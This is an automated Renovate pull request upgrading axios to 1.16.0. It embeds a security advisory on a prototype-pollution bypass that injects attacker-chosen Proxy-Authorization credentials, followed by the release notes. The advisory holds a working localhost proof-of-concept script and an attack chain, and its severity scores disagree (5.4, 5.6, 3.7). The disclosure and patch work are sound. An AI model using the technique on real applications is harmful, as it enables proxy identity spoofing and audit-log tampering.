chore(deps): update dependency axios to v1.16.0 [security]

[renovate]

This PR contains the following updates:

Package	Change	Age	Confidence
axios (source)	1.15.2 → 1.16.0

---

Axios has a Patch Bypass: Proxy-Authorization Header Injection via Prototype Pollution — Incomplete Null-Prototype Fix

CVE-2026-44489 / GHSA-654m-c8p4-x5fp

More information

Details

[Patch Bypass] Proxy-Authorization Header Injection via Prototype Pollution — Incomplete Null-Prototype Fix in Axios 1.15.2

Summary

The Object.create(null) fix introduced in Axios 1.15.2 (GHSA-q8qp-cvcw-x6jj) protects the top-level config object from prototype pollution. However, nested objects created by utils.merge() (e.g., config.proxy) are still constructed as plain {} with Object.prototype in their chain.

The setProxy() function at lib/adapters/http.js:209-223 reads proxy.username, proxy.password, and proxy.auth without hasOwnProperty checks. When Object.prototype.username is polluted, setProxy() constructs a Proxy-Authorization header with attacker-controlled credentials and injects it into every proxied HTTP request.

Severity: Medium (CVSS 5.4)
Affected Versions: 1.15.2 (and potentially 1.15.1)
Vulnerable Component: lib/adapters/http.js (setProxy()) + lib/utils.js (merge())

CWE

• CWE-1321: Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')
• CWE-113: Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Response Splitting')

CVSS 3.1

Score: 5.6 (Medium)

Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L

Metric	Value	Justification
Attack Vector	Network	PP triggered remotely via vulnerable dependency
Attack Complexity	High	Requires two preconditions: (1) PP in dependency tree, AND (2) the application must explicitly configure config.proxy. Unlike GHSA-q8qp-cvcw-x6jj which affected all requests unconditionally
Privileges Required	None	No authentication needed
User Interaction	None	No user interaction required
Scope	Unchanged	Within the proxy authentication context
Confidentiality	Low	Attacker-controlled identity appears in proxy authentication logs, but the attacker does NOT see request/response data (unlike config.baseURL hijack)
Integrity	Low	Proxy-Authorization header injected; proxy may apply different access policies based on injected identity
Availability	Low	If proxy rejects the injected credentials, legitimate requests may fail

Why This Is Lower Severity Than GHSA-q8qp-cvcw-x6jj (7.4 High)

Factor	GHSA-q8qp-cvcw-x6jj	This Finding
Precondition	None — all requests affected	Must have config.proxy set
config.baseURL PP	Hijacks all relative URL requests	Not applicable
config.auth PP	Injects Authorization to target server	Only injects Proxy-Authorization to proxy
Attacker sees traffic	Yes (via baseURL redirect)	No — only proxy identity affected
Impact scope	Universal — every axios request	Only requests with explicit proxy config

This Is a Patch Bypass

This vulnerability bypasses the fix introduced in Axios 1.15.2 for GHSA-q8qp-cvcw-x6jj. The fix correctly uses Object.create(null) for the config object, blocking direct prototype pollution on config.proxy, config.auth, etc.

However, the fix is incomplete: when a user legitimately sets config.proxy = { host: 'proxy.corp', port: 8080 }, the mergeConfig() function passes this object through utils.merge(), which creates a new plain {} object (lib/utils.js:406: const result = {};). This new object inherits from Object.prototype, re-opening the prototype pollution attack surface on the nested proxy object.

Layer	Protection	Status
config (top-level)	Object.create(null)	✓ Fixed
config.proxy (nested)	utils.merge() → const result = {}	✗ NOT Fixed
setProxy() reads	proxy.username, proxy.auth without hasOwnProperty	✗ NOT Fixed

Root Cause Analysis

Step 1: utils.merge() creates plain {} for nested objects

File: lib/utils.js, line 406

function merge(/* obj1, obj2, obj3, ... */) {
  const result = {};  // ← Plain object with Object.prototype!
  // ...
}

When mergeConfig() processes config.proxy, getMergedValue() calls utils.merge(), which creates a plain {} for the nested object. This plain object inherits from Object.prototype.

Step 2: setProxy() reads proxy properties without hasOwnProperty

File: lib/adapters/http.js, lines 209-223

function setProxy(options, configProxy, location) {
  let proxy = configProxy;
  // ...
  if (proxy) {
    if (proxy.username) {                    // ← traverses Object.prototype!
      proxy.auth = (proxy.username || '') + ':' + (proxy.password || '');
    }

    if (proxy.auth) {                        // ← traverses Object.prototype!
      const validProxyAuth = Boolean(proxy.auth.username || proxy.auth.password);
      if (validProxyAuth) {
        proxy.auth = (proxy.auth.username || '') + ':' + (proxy.auth.password || '');
      }
      // ...
      const base64 = Buffer.from(proxy.auth, 'utf8').toString('base64');
      options.headers['Proxy-Authorization'] = 'Basic ' + base64;  // ← INJECTED!
    }
    // ...
  }
}

Complete Attack Chain

Object.prototype.username = 'attacker'
Object.prototype.password = 'stolen-creds'
         │
         ▼
  User config: { proxy: { host: 'proxy.corp', port: 8080 } }
         │
         ▼
  mergeConfig() → utils.merge() → new plain {}
  config.proxy = { host: 'proxy.corp', port: 8080 }  (own properties)
  config.proxy inherits from Object.prototype         (has .username, .password)
         │
         ▼
  setProxy() at http.js:209:
    proxy.username → 'attacker' (from Object.prototype) → truthy!
    proxy.auth = 'attacker' + ':' + 'stolen-creds'
         │
         ▼
  http.js:223: Proxy-Authorization: Basic YXR0YWNrZXI6c3RvbGVuLWNyZWRz
  Injected into EVERY proxied HTTP request!

Proof of Concept

import http from 'http';
import axios from './index.js';

// Proxy server logs received Proxy-Authorization
const proxyServer = http.createServer((req, res) => {
  console.log('Proxy-Authorization:', req.headers['proxy-authorization']);
  res.writeHead(200);
  res.end('OK');
});
await new Promise(r => proxyServer.listen(0, r));
const proxyPort = proxyServer.address().port;

// Target server
const target = http.createServer((req, res) => { res.writeHead(200); res.end(); });
await new Promise(r => target.listen(0, r));

// Simulate prototype pollution from vulnerable dependency
Object.prototype.username = 'attacker';
Object.prototype.password = 'stolen-creds';

// Developer sets proxy WITHOUT auth — expects no auth header
await axios.get(`http://127.0.0.1:${target.address().port}/api`, {
  proxy: { host: '127.0.0.1', port: proxyPort, protocol: 'http' },
});

// Proxy receives: Proxy-Authorization: Basic YXR0YWNrZXI6c3RvbGVuLWNyZWRz
// Decoded: attacker:stolen-creds

delete Object.prototype.username;
delete Object.prototype.password;
proxyServer.close();
target.close();

Reproduction Environment

Axios version: 1.15.2 (latest patched release)
Node.js version: v20.20.2
OS: macOS Darwin 25.4.0

Reproduction Steps

##### 1. Install axios 1.15.2
npm pack axios@1.15.2
tar xzf axios-1.15.2.tgz && mv package axios-1.15.2
cd axios-1.15.2 && npm install

##### 2. Save PoC as poc.mjs (code from Section 7 above)

##### 3. Run
node poc.mjs

Verified PoC Output

=== Axios 1.15.2: PP → Proxy-Authorization Injection ===

[1] Normal request with proxy (no auth):
  Proxy-Authorization: none

[2] Prototype Pollution: Object.prototype.username = "attacker"
  Proxy-Authorization: Basic YXR0YWNrZXI6c3RvbGVuLWNyZWRz
  Decoded: attacker:stolen-creds
  → PP injected proxy credentials: attacker:stolen-creds

[3] Impact:
  ✗ Attacker injects Proxy-Authorization into all proxied requests
  ✗ If proxy logs auth, attacker credential appears in proxy logs
  ✗ If proxy authenticates based on this, attacker controls proxy identity
  ✗ Works on 1.15.2 despite null-prototype config fix
  ✗ Root cause: proxy object is plain {} from utils.merge, NOT null-prototype

Confirming the Bypass Mechanism

Direct PP (config.proxy) — BLOCKED by 1.15.2:
  Object.prototype.proxy = { host: 'evil' }
  config.proxy = undefined            ← null-prototype blocks ✓

Nested PP (proxy.username) — BYPASSES 1.15.2:
  Object.prototype.username = 'attacker'
  config.proxy = { host: 'legit', port: 8080 }  ← user-set, own properties
  config.proxy own keys: ['host', 'port']        ← username NOT own
  config.proxy.username = 'attacker'             ← inherited from Object.prototype!
  hasOwn(config.proxy, 'username') = false

##### Impact Analysis

- **Proxy Identity Spoofing:** The injected `Proxy-Authorization` header authenticates all requests to the proxy as the attacker. If the proxy enforces authentication-based access control or logging, the attacker controls the identity.
- **Proxy Log Poisoning:** Proxy servers that log authenticated usernames will record "attacker" instead of the real user, enabling audit trail manipulation.
- **Credential Injection Amplification:** If the proxy forwards the `Proxy-Authorization` header upstream (some transparent proxies do), the attacker's credentials propagate through the proxy chain.
- **Universal Scope When Proxy Is Configured:** Affects every axios request that uses a proxy configuration without explicit auth — a common pattern in corporate environments.

##### Prerequisite

- Application must use `config.proxy` (explicit proxy configuration)
- A separate prototype pollution vulnerability must exist in the dependency tree
- `Object.prototype.username` or `Object.prototype.auth` must be polluted

##### Recommended Fix

##### Fix 1: Use `hasOwnProperty` in `setProxy()`

```javascript
function setProxy(options, configProxy, location) {
  let proxy = configProxy;
  // ...
  if (proxy) {
    const hasOwn = (obj, key) => Object.prototype.hasOwnProperty.call(obj, key);

    if (hasOwn(proxy, 'username')) {
      proxy.auth = (proxy.username || '') + ':' + (proxy.password || '');
    }

    if (hasOwn(proxy, 'auth')) {
      // ... existing auth handling ...
    }
  }
}

Fix 2: Use null-prototype objects in utils.merge()

// lib/utils.js line 406
function merge(/* obj1, obj2, obj3, ... */) {
  const result = Object.create(null);  // ← null-prototype for nested objects too
  // ...
}

Fix 3 (Comprehensive): Apply null-prototype to all objects created by getMergedValue()

References

• CWE-1321: Prototype Pollution
• GHSA-q8qp-cvcw-x6jj: Original PP Gadgets Fix (Axios 1.15.2)
• GHSA-fvcv-3m26-pcqx: Related PP Gadget (Axios 1.15.0)
• Axios GitHub Repository

Severity

• CVSS Score: 3.7 / 10 (Low)
• Vector String: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N

References

• https://github.com/axios/axios/security/advisories/GHSA-654m-c8p4-x5fp
• https://github.com/axios/axios/security/advisories/GHSA-q8qp-cvcw-x6jj
• https://github.com/advisories/GHSA-654m-c8p4-x5fp

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

---

Release Notes

axios/axios (axios)

v1.16.0

Compare Source

v1.16.0 — May 2, 2026

This release adds support for the QUERY HTTP method and a new ECONNREFUSED error constant, lands a substantial wave of HTTP, fetch, and XHR adapter bug fixes around redirects, aborts, headers, and timeouts, and welcomes 23 new contributors.

⚠️ Notable Changes

A handful of fixes in this release are either security-adjacent or change observable behaviour. Please review before upgrading:

• Fetch adapter now enforces maxBodyLength and maxContentLength. These limits were silently ignored on the fetch adapter prior to 1.16.0 — anyone relying on them as a safety net (DoS protection, accidental large uploads) had no protection. (#​10795)
• Proxy requests now preserve user-supplied Host headers. Previously, the proxy path could overwrite a custom Host. Virtual-host-style routing through a proxy will now behave correctly. (#​10822)
• Basic auth credentials embedded in URLs are now URL-decoded. If you have percent-encoded credentials in a URL (e.g. https://user:p%40ss@host), the decoded value is what now goes on the wire. (#​10825)
• parseProtocol now strictly requires a colon in the protocol separator. Strings that loosely parsed as protocols before may no longer match. (#​10729)
• Deprecated unescape() replaced with modern UTF-8 encoding. Non-ASCII URL handling is now spec-correct; consumers depending on legacy unescape() quirks may see different output bytes. (#​7378)
• transformRequest input typing change was reverted. The typing change introduced in #​10745 was reverted in #​10810 after follow-up review — net behavior is unchanged from 1.15.2. (#​10745, #​10810)

🚀 New Features

• QUERY HTTP Method: Added support for the QUERY HTTP method across adapters and type definitions. (#​10802)
• ECONNREFUSED Error Constant: Exposed ECONNREFUSED as a constant on AxiosError so callers can match connection-refused failures without comparing string literals (closes #​6485). (#​10680)
• Encode Helper Export: Exported the internal encode helper from buildURL so userland param serializers can reuse the same encoding logic that axios uses internally. (#​6897)

🐛 Bug Fixes

• HTTP Adapter — Redirects & Headers: Cleared stale headers when a redirect targets a no-proxy host, fixed the redirect listener chain so listeners no longer stack across hops, restored the missing requestDetails argument on beforeRedirect, preserved user-supplied Host headers when forwarding through a proxy, and properly URL-decoded basic auth credentials. (#​10794, #​10800, #​6241, #​10822, #​10825)
• HTTP Adapter — Streams & Timeouts: Preserved the partial response object on AxiosError when a stream is aborted after headers arrive, honoured the timeout option during the connect phase when redirects are disabled, and resolved an unsettled-promise hang when an aborted request was combined with compression and maxRedirects: 0. (#​10708, #​10819, #​7149)
• Fetch Adapter: Enforced maxBodyLength / maxContentLength in the fetch adapter, set the User-Agent header to match the HTTP adapter, preserved the original abort reason instead of replacing it with a generic error, and deferred global access so importing the module no longer throws a TypeError in restricted environments. (#​10795, #​10772, #​10806, #​7260)
• XHR Adapter: Unsubscribed the cancelToken and AbortSignal listeners on the error, timeout, and abort code paths to prevent leaked subscriptions. (#​10787)
• Error Handling: Attached the parsed response to AxiosError when JSON.parse fails inside dispatchRequest, prevented settle from emitting undefined error codes, and tightened the parseProtocol regex to require a colon in the protocol separator. (#​10724, #​7276, #​10729)
• Types & Exports: Aligned the CommonJS CancelToken typings with the ESM build, fixed a compiler error caused by RawAxiosHeaders, and re-exported create from the package index. (#​7414, #​6389, #​6460)
• UTF-8 Encoding: Replaced the deprecated unescape() call with a modern UTF-8 encoding implementation. (#​7378)
• Misc Cleanup: Resolved a batch of small inconsistencies and gadget-level issues across the codebase. (#​10833)

🔧 Maintenance & Chores

• Refactor — ES6 Modernisation: Modernised the utils module and XHR adapter to use ES6 features, and tidied the multipart boundary error message. (#​10588, #​7419)
• Tests: Hardened the HTTP test server lifecycle to fix flaky FormData EPIPE failures, fixed Win32 platform support for the pipe tests, and corrected an incorrect test assumption. (#​10820, #​10791, #​10796)
• Docs: Documented paramsSerializer.encode for strict RFC 3986 query encoding, updated the parseReviver TypeScript definitions and configuration docs for ES2023, added timeout guidance to the README's first async example, and expanded notes around the recent type changes. (#​10821, #​10782, #​10759, #​10804)
• Reverted: Reverted the transformRequest input typing change from #​10745 after follow-up review. (#​10745, #​10810)
• Dependencies: Bumped actions/setup-node, the github-actions group, and postcss (in /docs) to their latest versions. (#​10785, #​10813, #​10814)
• Release: Updated changelog and packages, and prepared the 1.16.0 release. (#​10790, #​10834)

🌟 New Contributors

We are thrilled to welcome our new contributors. Thank you for helping improve axios:

• @​singhankit001 (#​10588)
• @​cuiweixie (#​7419)
• @​iruizsalinas (#​10787)
• @​MarcosNocetti (#​10680)
• @​deepview-autofix (#​10729)
• @​atharvasingh7007 (#​10745)
• @​OfekDanny (#​10772)
• @​mnahkies (#​7414)
• @​tboyila (#​10759)
• @​Kingo64 (#​6897)
• @​ramram1048 (#​6389)
• @​FLNacif (#​6460)
• @​zozo123 (#​10806)
• @​pierluigilenoci (#​10802)
• @​afurm (#​10708)
• @​karan-lrn (#​7378)
• @​ebeigarts (#​7149)
• @​Raymondo97 (#​10782)
• @​mixelburg (#​10821)
• @​ashishkr96 (#​10822)
• @​cyphercodes (#​10819)
• @​Jye10032 (#​7260)
• @​VeerShah41 (#​7276)

Full Changelog

---

Configuration

📅 Schedule: (UTC)

• Branch creation
  • ""
• Automerge
  • At any time (no schedule defined)

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.